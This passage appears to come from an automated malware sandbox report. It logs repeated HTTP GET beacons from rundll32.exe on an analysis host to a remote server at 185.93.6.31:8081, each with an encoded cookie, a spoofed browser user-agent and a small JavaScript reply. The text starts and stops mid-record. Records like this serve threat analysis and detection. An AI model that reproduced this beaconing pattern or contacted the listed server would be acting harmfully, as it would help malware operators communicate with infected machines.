              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=AwU8qo_9PnqUL29tufEMQljJk1Sr-fV9mDSTS2TbfGXjhaF-_1aI4syv_Uyjzgmve6nUBCXRi9PfcTx1zGJBwgySGWhnUKIQKLdLRGMzX-zzz8Rwly4nmHG8TXZQv35O8zrl5mrfK5ck7Eo2LMjTFfKVD6-bHAO47nJDzaeUSUcFSkLm
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:26.073896885 CEST1807INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:26 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              13192.168.2.749757185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:30.039153099 CEST1810OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=B47OKYp5cTmTShmWLZXpVtHOOHBKfCMK-KAtrl2OzfeoLTVmC0XjdlrPYw4K5aNNeMtLHSgQaxlK5EozsUImtteFyGVordlbmKfu0M_-eCixY06Cde_7h7zAx2fL8As-ciCWUDAY90MSvj9e_jiLvXzAjzvmjAbBs_EFhDJBcTVlI6gG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:30.067497015 CEST1811INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:30 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              14192.168.2.749758185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:30.635162115 CEST1814OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=iU1Z0iwkLXwueNPTY8NOG94K7_B-ELZNCa-QYKyuVmb6p9-jGdqpSctyNFEWMBsepNFkOFfrytaMyDg49IhQsZPkpVW9jWd8NVOfUww2l4SjhbzGvcB_KIF32RsWCBUjfBJ9xclBr3gXizrUftIoejj8Bfg0U60kGfmiPlZehmPnEBAy
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:30.664266109 CEST1815INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:30 GMT
              Server: cloudflare
              Content-Length: 2351
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              15192.168.2.749759185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:31.745750904 CEST1818OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qOm_jCQRvVw_w-xLEh2PZPMlEHIAFXZbM9gQbc83_0NIaSJYVLoLxGdDfmoIIoqJ0EVXIo49CPV0nb9TZ47C5Kd-mk7MvCE2g1vIYsjf3MpYI0dWPMKkvtpQzlD7U_1oWNZmwMEzqLGPAMkQhyRQM1l5jIkw8ICeRZ7A6wx4ymGupsHA
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:31.777113914 CEST1818INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:31 GMT
              Server: cloudflare
              Content-Length: 2202
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              16192.168.2.749762185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:35.931936026 CEST1823OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=58MJJWo0tjVzB96azdguWjGD_3yqMeQGGO3qor3DCvtIYPJq6wgkerqCpALqqGRBmIaMEchdrBWqqY0_UQ_hujfID2mI4B5XeOop3C-zvyRRLomOlaI8i1yNAGsrvcwykm1RXNBVME_y8_hSHnVMsZyNSDcGwcHNU7zCiNIMtjmFbm8K
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:35.960251093 CEST1830INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:35 GMT
              Server: cloudflare
              Content-Length: 2479
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              17192.168.2.749763185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:38.946749926 CEST1845OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=NOIpFJGLXbqT16MV3mw-3WOlnzbDv8aLtADgphEBJqBHCK9lpHXZj3bdRJern2vYGX4U_upEuhAxZ0j-SScgdy5L1ZMAIhe6iPzvlbGZ50IeKswAAG8P7jzYqd2rp2Xlwb0NA3Tu376qJEoSw31YvIVTdT6J_N3ipFbS-Ovx9qVav2D0
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:38.975399971 CEST1845INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:38 GMT
              Server: cloudflare
              Content-Length: 2181
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              18192.168.2.749764185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:39.773361921 CEST1848OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=8dZTfX0uUa1m_AC6SyJjlaoa_INZKpqqauf8nJYIE7IRVs6pDYXnNT58kptRHWZ4iXq709cC5AQtolOiPrEuFf5Bdr-Vg83H2mQkk5HgMDsBHKunZf1IT4NvIqGibBGZAemKMZgMREDWPyXh3hu8wgBGYHhpz2xvHKEsGlVHJpD3mS0x
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:39.802710056 CEST1849INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:39 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              19192.168.2.749765185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:44.619920969 CEST1852OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=EdI9V5wlgkeFFuroO8kaKMeSyw5cINB07vze0EvSPom-ccYYHRkQCEyTkHAcuVAzbpe4Yz5MmGdcuLlNpx7VyMHZOxt-8Soljvsdrtmii1anP738Y7MI-aqcNBndrPhAZHxlLiZEBD0E4swg6GR4w2qcfEXw0PW_pa32-iQdgktzf1t4
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:44.648509979 CEST1853INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:44 GMT
              Server: cloudflare
              Content-Length: 2181
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              2192.168.2.749742185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:11.283211946 CEST1390OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=fc3_iPE1_Vjq56xPxznPYCYBUHbVMTZf5vxQaRoTv0edTWJcgZ5LwLJnPm7dBsqNBWEXJlsZSPGhuf9XsqqC4HJa2koZmGEyVn-IZh37nM6NBwdS6ebkug90jlQud71sjfImxBQX6LVaJIkUUgAQN4xdzI3l1MCakLqA79lcimV7goHE
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.318860054 CEST1459INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              20192.168.2.749766185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:48.402589083 CEST1856OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=VCBqBNjYaNTDCjnD7tRa7A_sxfr83KPTzxHF5TP-Ksu0oPfQqHPeTJuKq-L0618BLIyCqnL03X2IVGrbm0cXbFu3T8YwdfS-f5Id6jQWCUKk6pLewAtxNiaZG9gHmijgpB-zSD36fTlzyRyYe-2Fu6WwWQHMOVUWuVcVY_CxH-lSbxRI
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:48.431732893 CEST1856INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:48 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              21192.168.2.749767185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:48.466336012 CEST1860OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=qYGqnwzo3jEOtCCeQw-9Vv7GHL1e3EUAKWNjLYxipSvaayzuORZaBOu-xxw2_OhThB2XdXcnOZusBMt11ESj_LMoVhidQZQxFZ9sHiz6ZMmDSU-LnQyMZaG7KlY2xOZuXN6OiOmNXDU3R8mZXh7bNxgw9rUUn15pOTVRc3aSdS7H3ON_
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:48.495151997 CEST1860INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:48 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              22192.168.2.749768185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:50.603666067 CEST1864OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=z3wjoEKLnLBbuPQf5WcE3xk81fmCjs6DMFLAJ5V8IH5g39jvw7cO_5I9jofCF07EsDmmlODihpCCFqe6ebDLPx93JeygXzTSUFUDWQcMlaF5kaMLvR0WDnQyKu4DAua3utJ72fjqGsraTNLXNspmNLQyYrIufutIewPoDfqznLyt0UWP
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:50.631973982 CEST1864INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:50 GMT
              Server: cloudflare
              Content-Length: 2245
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              23192.168.2.749769185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:54.144264936 CEST1867OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=pRHTCAB4p6YCJFkJT5_EwfJWZSpSTDyXJfMauoDy3LzW-1V5NYYjk-cuvos6bJHEiI3u4nu3QAyglLLi2NTaa7-4L4-R0e2mGQ8ViSBqHV6P2TYckZz18q0rU8E6VJ_5UE73H-UdJaI717AOUo6ioBSgjyIYDyf-NaUo5HoCDLnLTJro
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:54.175657988 CEST1868INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:54 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              24192.168.2.749770185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:54.343552113 CEST1871OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=s2BnkT-YZUEkSjRWCZRXeeisyG8bnK5GKFHIcNS-J15T4PpFTzPT2XzKpncTq1KUy8yPP5W00OhvFGdOfAca-bz3QlPXNfkrmNIQf9NWBNdDqp9LJ0t8o8HZFk3g2iV1Q1--3dq6cKyUiRENnK2ILkLwVJQreViDXhcY9hfxEny1Lxnd
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:54.374902964 CEST1872INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:54 GMT
              Server: cloudflare
              Content-Length: 2415
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              25192.168.2.749787185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:59.994988918 CEST2152OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=YPUU7u0Cq_70McNRSu4zkba14rctB_nNn9v3aTr1FzDPVu-hbD45sT20ucltnnmKH7CR2k9rsd4tn5D01jn8cbD-EqIP1gOc_9w0F6iFou_WGJRFEpQhQNu7HaCsi9H5FVtMl1djLYR1xeWZmUNRehu7VfyB99wG1IrfQ1U6q_ICWHLB
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:00.023251057 CEST2153INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:00 GMT
              Server: cloudflare
              Content-Length: 2394
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              26192.168.2.749790185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:00.280576944 CEST2168OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=G3ex6b4exUe8Qjvo8fmmIEwwB8vsKl52m5V4Wz6Uvl1onTeYi-BBcllI3GqECvMlNuuMA8XRIu0e8tADZrK4igHeTW4vt49Hp2l3aJ4Mf78xv1T9L_qXExNNMSCEMv0Y7iiV_lt7R0OFsdLv7OjAQarG7cOmaUUfi8NKBcRkblh1KvgJ
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:00.308274984 CEST2184INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:00 GMT
              Server: cloudflare
              Content-Length: 2266
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              27192.168.2.749809185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:04.089521885 CEST2772OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=rpXGOiJtxOo5v5X9FGH20vVZacQGaQ_tNaRp28lLhvVOFVvuUsZycmE_B9wOXvM_1jkulIhBcUNy4cblYfK7UqEC4_jKwFiAhSex1M6jpXxeXz7gOr7dCNwst-b9L4TeXqofdsdP0QeJfLCmgVgphV8F9T82jPkoQ-K5XQoEs9eo2rh2
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:04.119318008 CEST2772INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:04 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              28192.168.2.749810185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:08.688164949 CEST2812OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=n7DjpjrZlwg4hWmndT70b8j3VYRo7Qw5H1IqFLpT7BLsWmXXDycTPd2PjiUAzaFqsizeTEEWcKKaNYJM4nXqxYUZHyGrcN0II64lJxrLLfC1eAayqz3FXJeKY28A9a9Xau_Hsd-8FQwBdoCgaC-SDi4Bv4wirhdQDwQYSkCjPBfx7apG
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:08.717215061 CEST2812INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:08 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              29192.168.2.749811185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:09.293232918 CEST2816OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=ykuj-0e8HOtej3RE4FCEhBwLVaKHuU7YNWVAfJBLoCVl6Fi0xoCOpJcKDtzHIM6ftQ4mz-XVBsuHISfhfIdLZBpApbelaLSJVWKDAgI7Ffp8piNQuCqWVXEFqrUGNWbsv-X7gv3dmpHfe1KMM_3mb7EF4ukrSWsTfjRoVv-EHOeo5sXU
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:09.323286057 CEST2816INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:09 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              3192.168.2.749743185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:18:11.408258915 CEST1463OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=Q5hpQs5v1lLXXL79aYNOPZXYnxsOaoRhvLaKxRmYapzsO5INT1NEHR7ZxGVO8wQmPN3sdmwGzHIO8u1Y9VSB3ZOTbw4su34w3LFJu4vo30P1denpMflc7PjWYAyP5qxVNjYxO3QOUChWqJg1ui4s1jjWKFCimqGq9-ei73ZX1l4hNQ9t
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:18:11.439152956 CEST1463INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:18:11 GMT
              Server: cloudflare
              Content-Length: 2458
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              30192.168.2.749815185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:13.824549913 CEST2865OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=zTRrtkHMaWZaHjhxd8BbXpb4xEhlyKJhVgXEV6rqK3kttPZiMWff_gKeqlBt_16ztZiDGOvg3M8RQGtpAlMW3sKjTnSpYfUM5oYcWK0CCPA9_pNsWR9whL-NGmqejilSPQuy-qTufIvq3R0q4vmECTykWLNVLVSkIEMU0WmlHlvLexX6
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:13.855338097 CEST2866INHTTP/1.1 200 OK
              Date: Sat, 25 Sep 2021 18:19:13 GMT
              Server: cloudflare
              Content-Length: 2287
              Keep-Alive: timeout=10, max=100
              Connection: keep-alive
              Content-Type: application/javascript; charset=utf-8
              Cache-Control: max-age=0, no-cache
              Pragma: no-cache


              Session IDSource IPSource PortDestination IPDestination PortProcess
              31192.168.2.749818185.93.6.318081C:\Windows\System32\rundll32.exe
              TimestampkBytes transferredDirectionData
              Sep 25, 2021 20:19:16.896758080 CEST2872OUTGET /Calculate/team/WIQK6GMJ HTTP/1.1
              Accept: application/xhtml+xml, image/*, application/xml
              Accept-Language: es-do
              Accept-Encoding: *, compress
              Cookie: AQ93_L8X8ZA0N8D91LJDCDRZ2V5U3R1K4XOTN=3KDMj3nJuCF7lUaONi7bRovneq0r_SMQXEIFPflDwzuvSkr-TDc8FJ6foQxD3Y5D8TzxZQIGX4vZJa1loWXF7MYJMAjoYPIhYL4KDlnbAtn2aCmb6C3qddSaTEZD5YB-Kf_omJysOiVCZq-JKz-9J20RkKVhvjh5TBQ3YwOzEz6y_YVv
              User-Agent: Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
              Host: 185.93.6.31:8081
              Connection: Keep-Alive
              Cache-Control: no-cache
              Sep 25, 2021 20:19:16.926899910 CEST2873INHTTP/1.1 200 OK
